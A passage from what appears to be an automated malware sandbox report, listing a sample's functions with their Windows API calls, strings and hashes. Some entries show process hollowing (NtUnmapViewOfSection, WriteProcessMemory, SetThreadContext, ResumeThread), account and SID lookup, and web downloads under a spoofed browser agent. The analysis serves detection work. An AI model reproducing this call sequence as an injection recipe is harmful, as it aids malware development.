                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: 43bdfabc7d86855f314bd224a0fdba953f800fcfa8ecb1157b2cf3d528735005
                                          • Instruction ID: ad10479c960d0cdd6242a46e133df79e5fd266552ac84c1325d524ac4b67c022
                                          • Opcode Fuzzy Hash: 43bdfabc7d86855f314bd224a0fdba953f800fcfa8ecb1157b2cf3d528735005
                                          • Instruction Fuzzy Hash: 78E0EC31404648AFCF657F94DC09A8A3B69FF44751B004414F9159A231CB39EEE2FB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F10567, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetUnhandledExceptionFilter.KERNELBASE(Function_00010573,00F1006C), ref: 00F1056C
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled
                                          • String ID:
                                          • API String ID: 3192549508-0
                                          • Opcode ID: 1147e91df718062fa745bfa666ecf156e5c3766576d18fc0cc57608059ec4525
                                          • Instruction ID: 08336b17012e35458ce4148202868ce15bb43b8df2dc307a250c106e09e1d2cf
                                          • Opcode Fuzzy Hash: 1147e91df718062fa745bfa666ecf156e5c3766576d18fc0cc57608059ec4525
                                          • Instruction Fuzzy Hash:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F01DA0, Relevance: 27.2, APIs: 18, Instructions: 157memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 00F01DCA
                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00F01DDF
                                          • HeapAlloc.KERNEL32(00000000), ref: 00F01DE2
                                          • GetUserNameW.ADVAPI32(00000000,?), ref: 00F01DF0
                                          • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00F01E13
                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00F01E1E
                                          • HeapAlloc.KERNEL32(00000000), ref: 00F01E21
                                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00F01E31
                                          • HeapAlloc.KERNEL32(00000000), ref: 00F01E34
                                          • LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00F01E5E
                                          • ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00F01E71
                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00F01F02
                                          • HeapFree.KERNEL32(00000000), ref: 00F01F0B
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F01F10
                                          • HeapFree.KERNEL32(00000000), ref: 00F01F13
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F01F1A
                                          • HeapFree.KERNEL32(00000000), ref: 00F01F1D
                                          • LocalFree.KERNEL32(00000000), ref: 00F01F22
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Heap$Process$FreeName$Alloc$AccountLookupUser$ConvertLocalString
                                          • String ID:
                                          • API String ID: 3326663573-0
                                          • Opcode ID: 6dab9b23f45c1f9569e1a7092ef37128528678e981dd9678e1968e2209704b3e
                                          • Instruction ID: b41d243bd4ff8fc77e69d80420d67575a36ab5b42215774a04a0101123df0bef
                                          • Opcode Fuzzy Hash: 6dab9b23f45c1f9569e1a7092ef37128528678e981dd9678e1968e2209704b3e
                                          • Instruction Fuzzy Hash: E3513D75E00219ABDB20EFA5DC85BAFBBBCFB44350F144559E905A3280DB749E05ABA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1DBF8, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F1D8B1: CreateFileW.KERNELBASE(00000000,00000000,?,00F1DCA1,?,?,00000000,?,00F1DCA1,00000000,0000000C), ref: 00F1D8CE
                                          • GetLastError.KERNEL32 ref: 00F1DD0C
                                          • __dosmaperr.LIBCMT ref: 00F1DD13
                                          • GetFileType.KERNELBASE(00000000), ref: 00F1DD1F
                                          • GetLastError.KERNEL32 ref: 00F1DD29
                                          • __dosmaperr.LIBCMT ref: 00F1DD32
                                          • CloseHandle.KERNEL32(00000000), ref: 00F1DD52
                                          • CloseHandle.KERNEL32(00F1649E), ref: 00F1DE9F
                                          • GetLastError.KERNEL32 ref: 00F1DED1
                                          • __dosmaperr.LIBCMT ref: 00F1DED8
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                          • String ID: H
                                          • API String ID: 4237864984-2852464175
                                          • Opcode ID: bc246ab746db8355e42fc4592b0321641c843c46130460df7a3f756fdd07f0ec
                                          • Instruction ID: 40b842017ad8a2d066392dc44ae1810d7669e2841b12a47b7eeb6d0717b510bd
                                          • Opcode Fuzzy Hash: bc246ab746db8355e42fc4592b0321641c843c46130460df7a3f756fdd07f0ec
                                          • Instruction Fuzzy Hash: 66A13332A041489FCF19EF68DC91BEE7BB1AB46330F140159E811AF391DB399986EB51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F04DE0, Relevance: 3.1, APIs: 2, Instructions: 96synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 00F04E41
                                          • GetLastError.KERNEL32(?,00000000), ref: 00F04E47
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CreateErrorLastMutex
                                          • String ID:
                                          • API String ID: 1925916568-0
                                          • Opcode ID: b2dec2c5b5580cc3c55a491bb95d1e51e22804dbf2189d12cf0f9663367f6744
                                          • Instruction ID: 37a171220b5be0f83a9503af67d480ffe58696fa0b6b14a32b73eb593f9dee1c
                                          • Opcode Fuzzy Hash: b2dec2c5b5580cc3c55a491bb95d1e51e22804dbf2189d12cf0f9663367f6744
                                          • Instruction Fuzzy Hash: 5A31F271E001099BDF18DF68CC84BAEF7B2FF44301F608569E212E76D1D738AA85AB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F04DA0, Relevance: 3.0, APIs: 2, Instructions: 48synchronizationCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00F01DA0: GetUserNameW.ADVAPI32(00000000,?), ref: 00F01DCA
                                            • Part of subcall function 00F01DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 00F01DDF
                                            • Part of subcall function 00F01DA0: HeapAlloc.KERNEL32(00000000), ref: 00F01DE2
                                            • Part of subcall function 00F01DA0: GetUserNameW.ADVAPI32(00000000,?), ref: 00F01DF0
                                            • Part of subcall function 00F01DA0: LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00F01E13
                                            • Part of subcall function 00F01DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 00F01E1E
                                            • Part of subcall function 00F01DA0: HeapAlloc.KERNEL32(00000000), ref: 00F01E21
                                            • Part of subcall function 00F01DA0: GetProcessHeap.KERNEL32(00000008,?), ref: 00F01E31
                                            • Part of subcall function 00F01DA0: HeapAlloc.KERNEL32(00000000), ref: 00F01E34
                                            • Part of subcall function 00F01DA0: LookupAccountNameW.ADVAPI32(00000000,?,00000000,?,00000000,?,?), ref: 00F01E5E
                                            • Part of subcall function 00F01DA0: ConvertSidToStringSidW.ADVAPI32(00000000,00000000), ref: 00F01E71
                                          • CreateMutexW.KERNELBASE(00000000,00000000,?), ref: 00F04E41
                                          • GetLastError.KERNEL32(?,00000000), ref: 00F04E47
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Heap$Name$AllocProcess$AccountLookupUser$ConvertCreateErrorLastMutexString
                                          • String ID:
                                          • API String ID: 3154463122-0
                                          • Opcode ID: c43a4b52b38a24df95586b12d572889cf478dade5bb18408941260aa2032ce1f
                                          • Instruction ID: 48d96a33541628e7c06f575756e2f61bb506d2d1d23ba3e8e5d33002c42389fa
                                          • Opcode Fuzzy Hash: c43a4b52b38a24df95586b12d572889cf478dade5bb18408941260aa2032ce1f
                                          • Instruction Fuzzy Hash: DEF09630E012089BD754FBB5CD5AB9FB7B5EF44301F908029F625A61D1DB385D06ABD2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F151DE, Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 06fb267a1af394803637e55af1fffb3341f026c6d42a55db1a0e58e8d7c6c206
                                          • Instruction ID: 547b2a2ef6a16ce2572bc6bcca712fd670959a082572d6ad7a651e0c3b3da90e
                                          • Opcode Fuzzy Hash: 06fb267a1af394803637e55af1fffb3341f026c6d42a55db1a0e58e8d7c6c206
                                          • Instruction Fuzzy Hash: D9E06D23A55910D2E722763A7C463FA3686ABC1B72F21032AF424DA1D0EF7948C27695
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1645F, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: __wsopen_s
                                          • String ID:
                                          • API String ID: 3347428461-0
                                          • Opcode ID: 6ee4221dc78fa2c38d3652c079dfdd242a13d7e79f7c4f267e7dd60be5bbe1c4
                                          • Instruction ID: 441194e964523a1191694a006096e8fde9e9e8b21a0ba69e68880a6e53b9e13c
                                          • Opcode Fuzzy Hash: 6ee4221dc78fa2c38d3652c079dfdd242a13d7e79f7c4f267e7dd60be5bbe1c4
                                          • Instruction Fuzzy Hash: 23111571A0420AAFCF05DF58E9419DA7BF5EF48314F0540A9F809EB251D630EA21DBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1DB6A, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free
                                          • String ID:
                                          • API String ID: 269201875-0
                                          • Opcode ID: 9ba8c6d62c837557b7d10db139ff9f6489b14aed1980b721ae02a396919f42ec
                                          • Instruction ID: a54f8343276489a148bdde3311cb7676539da1b74c27021da93d745647bda84e
                                          • Opcode Fuzzy Hash: 9ba8c6d62c837557b7d10db139ff9f6489b14aed1980b721ae02a396919f42ec
                                          • Instruction Fuzzy Hash: 96014F72C05159BFCF41EFE88C019EE7FB5AF48310F144165F915E21A1E7358AA0EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1D8B1, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,00000000,?,00F1DCA1,?,?,00000000,?,00F1DCA1,00000000,0000000C), ref: 00F1D8CE
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: ce8c9ceaf84ea3b92a7f0c2ab71d5b65cbe47a55ad142398dd6e45a7235af084
                                          • Instruction ID: 55060a1dabbd20b4a53bca426bd4b20c79d125fc3f166ad4cfc500d63973d7b6
                                          • Opcode Fuzzy Hash: ce8c9ceaf84ea3b92a7f0c2ab71d5b65cbe47a55ad142398dd6e45a7235af084
                                          • Instruction Fuzzy Hash: 4BD06C3200020DBFDF129F84DC06EDA3BAAFB48714F014000BA1856020C732E872EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 00F02250, Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 155injectionthreadmemoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,00000000), ref: 00F0226C
                                          • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,?,?,?,00000000,00000000), ref: 00F022C5
                                          • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,00000000), ref: 00F022DE
                                          • GetThreadContext.KERNEL32(?,00000000,?,00000000,00000000), ref: 00F022F3
                                          • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,00000000), ref: 00F02316
                                          • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,00000000), ref: 00F0232E
                                          • GetProcAddress.KERNEL32(00000000), ref: 00F02335
                                          • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,00000000), ref: 00F02354
                                          • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00F0236F
                                          • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,?,00000000,?,00000000,00000000), ref: 00F023AC
                                          • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,?,00000000,?,00000000,00000000), ref: 00F023DC
                                          • SetThreadContext.KERNEL32(?,00000000,?,?,00000000,?,00000000,00000000), ref: 00F023F2
                                          • ResumeThread.KERNEL32(?,?,?,00000000,?,00000000,00000000), ref: 00F023FB
                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,?,00000000,00000000), ref: 00F02409
                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000), ref: 00F02420
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Process$MemoryVirtual$ThreadWrite$AllocContextFreeModule$AddressCreateFileHandleNameProcReadResume
                                          • String ID: NtUnmapViewOfSection$ntdll.dll
                                          • API String ID: 4033543172-1050664331
                                          • Opcode ID: 907f6451f7a9b447875fda73a83489c96aea5df2ebf8b6ce685065cfee58c014
                                          • Instruction ID: 50e70a5fccd9f4fd41c1657543bc50e6b030cc12e77af2a2a1a8b38848816d37
                                          • Opcode Fuzzy Hash: 907f6451f7a9b447875fda73a83489c96aea5df2ebf8b6ce685065cfee58c014
                                          • Instruction Fuzzy Hash: 94518E71A44308BBEB20DF94DC45FAABB78FF08705F504064F608E61D0D7B4A955EB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1CB2C, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                          Download Yara Rule
                                          APIs
                                          • ___free_lconv_mon.LIBCMT ref: 00F1CB70
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C726
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C738
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C74A
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C75C
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C76E
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C780
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C792
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C7A4
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C7B6
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C7C8
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C7DA
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C7EC
                                            • Part of subcall function 00F1C709: _free.LIBCMT ref: 00F1C7FE
                                          • _free.LIBCMT ref: 00F1CB65
                                            • Part of subcall function 00F16601: HeapFree.KERNEL32(00000000,00000000,?,00F156FE), ref: 00F16617
                                            • Part of subcall function 00F16601: GetLastError.KERNEL32(?,?,00F156FE), ref: 00F16629
                                          • _free.LIBCMT ref: 00F1CB87
                                          • _free.LIBCMT ref: 00F1CB9C
                                          • _free.LIBCMT ref: 00F1CBA7
                                          • _free.LIBCMT ref: 00F1CBC9
                                          • _free.LIBCMT ref: 00F1CBDC
                                          • _free.LIBCMT ref: 00F1CBEA
                                          • _free.LIBCMT ref: 00F1CBF5
                                          • _free.LIBCMT ref: 00F1CC2D
                                          • _free.LIBCMT ref: 00F1CC34
                                          • _free.LIBCMT ref: 00F1CC51
                                          • _free.LIBCMT ref: 00F1CC69
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                          • String ID:
                                          • API String ID: 161543041-0
                                          • Opcode ID: 74b034f9de3c598d73b44d2056c779a9738fc902358f46e2fcea3ddc56a20978
                                          • Instruction ID: 5c6ee7a78e03005171ad682400deb9682bec87fec8fe31ae0543773e5ff74c16
                                          • Opcode Fuzzy Hash: 74b034f9de3c598d73b44d2056c779a9738fc902358f46e2fcea3ddc56a20978
                                          • Instruction Fuzzy Hash: A6315B71A48340DFEB21AA79DC46BD6B3E9AF40321F104429E458DB191DF36ECD0EB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F1A84A, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID: 0-3907804496
                                          • Opcode ID: e98ef20f2725a5d8391e3f2e93ceec8e0160fe3c4b04ab6301e338f096842ed3
                                          • Instruction ID: da6670550e540ab0810be6c30fb7faf53a944ae4ef4f27a5d31d66e33d60f8c2
                                          • Opcode Fuzzy Hash: e98ef20f2725a5d8391e3f2e93ceec8e0160fe3c4b04ab6301e338f096842ed3
                                          • Instruction Fuzzy Hash: 17C10870E092899FDB15DF98CC81BEDBBB2BF89320F044059E514A7291D7359DC2EB22
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F02430, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 136networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetOpenW.WININET(Microsoft Internet Explorer,00000000,00000000,00000000,00000000), ref: 00F024D1
                                          • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00F024E3
                                          • InternetReadFile.WININET(00000000,?,00032000,00032000), ref: 00F024FA
                                          • InternetCloseHandle.WININET(00000000), ref: 00F0250B
                                          • InternetCloseHandle.WININET(00000000), ref: 00F0250E
                                          • InternetCloseHandle.WININET(00000000), ref: 00F0251F
                                          • InternetCloseHandle.WININET(00000000), ref: 00F02522
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: Internet$CloseHandle$Open$FileRead
                                          • String ID: <$Microsoft Internet Explorer$runas
                                          • API String ID: 4294395943-436926838
                                          • Opcode ID: 551529b91da2231fda1a48d1701ad9200af6d2312c043b20a752002f7143e204
                                          • Instruction ID: 91673539c51d09ec336edfba4e4e3e548b23f69b20ba5e081ec1b2c4f1e598c4
                                          • Opcode Fuzzy Hash: 551529b91da2231fda1a48d1701ad9200af6d2312c043b20a752002f7143e204
                                          • Instruction Fuzzy Hash: 7C410331E00219ABDB18DF64CC89BAEBBB9EF45300F108159F515A72D1D738AA41EFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F16DDA, Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: bbd7b1286bfc0fe50f4f89dd5394d6fa52552c170038b32eb8b5c69217be4e1d
                                          • Instruction ID: f101fec63f22d65194315aeec6bab0d25bb2c74281fb69f70e5e7b7a3ccee372
                                          • Opcode Fuzzy Hash: bbd7b1286bfc0fe50f4f89dd5394d6fa52552c170038b32eb8b5c69217be4e1d
                                          • Instruction Fuzzy Hash: 69215476900108EFCB41EF94C881DDEBBB9AF08355B0141A6F915DB162DB36EA94AB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F05F80, Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 311COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID: (
                                          • API String ID: 0-3887548279
                                          • Opcode ID: 9b4d2b03955c12cef830066c0f91de3d2623d0d3e1b4dc139ea318ee95dffe01
                                          • Instruction ID: c6c9cc566c072f3be8bc606b11de96e38675bf1847d11d8bcb0db7bf9cdd7994
                                          • Opcode Fuzzy Hash: 9b4d2b03955c12cef830066c0f91de3d2623d0d3e1b4dc139ea318ee95dffe01
                                          • Instruction Fuzzy Hash: ECC1B170E00208DBEF24EFA4CC95BDEBBB5AF55304F504199E405672C2DBB55A88EF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F10A40, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 168COMMON
                                          Download Yara Rule
                                          APIs
                                          • _ValidateLocalCookies.LIBCMT ref: 00F10A77
                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 00F10A7F
                                          • _ValidateLocalCookies.LIBCMT ref: 00F10B08
                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 00F10B33
                                          • _ValidateLocalCookies.LIBCMT ref: 00F10B88
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000B.00000002.667193143.0000000000F01000.00000020.00020000.sdmp, Offset: 00F00000, based on PE: true
                                          • Associated: 0000000B.00000002.667030042.0000000000F00000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667232103.0000000000F27000.00000002.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667359564.0000000000F30000.00000004.00020000.sdmp Download File
                                          • Associated: 0000000B.00000002.667366921.0000000000F35000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                          • String ID: csm$csm
                                          • API String ID: 1170836740-3733052814
                                          • Opcode ID: a91668567d5cf2654bc5153fb689c81ba73c6e251077b4b0f5093b3c3a251e8a
                                          • Instruction ID: d84df8460821d063720e7eb7143c9512b3e62687f3607e7eb69ed6ed91900517
                                          • Opcode Fuzzy Hash: a91668567d5cf2654bc5153fb689c81ba73c6e251077b4b0f5093b3c3a251e8a
                                          • Instruction Fuzzy Hash: 7051A334E00209DFCF14EF28D850ADE7BA5BF44324F1481A9E8059B392DBB5D9C6EB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00F06B90, Relevance: 12.3, APIs: 8, Instructions: 256networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • InternetOpenW.WININET(00F2CDDC,00000000,00000000,00000000,00000000), ref: 00F06BBC
                                          • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00F06BDE
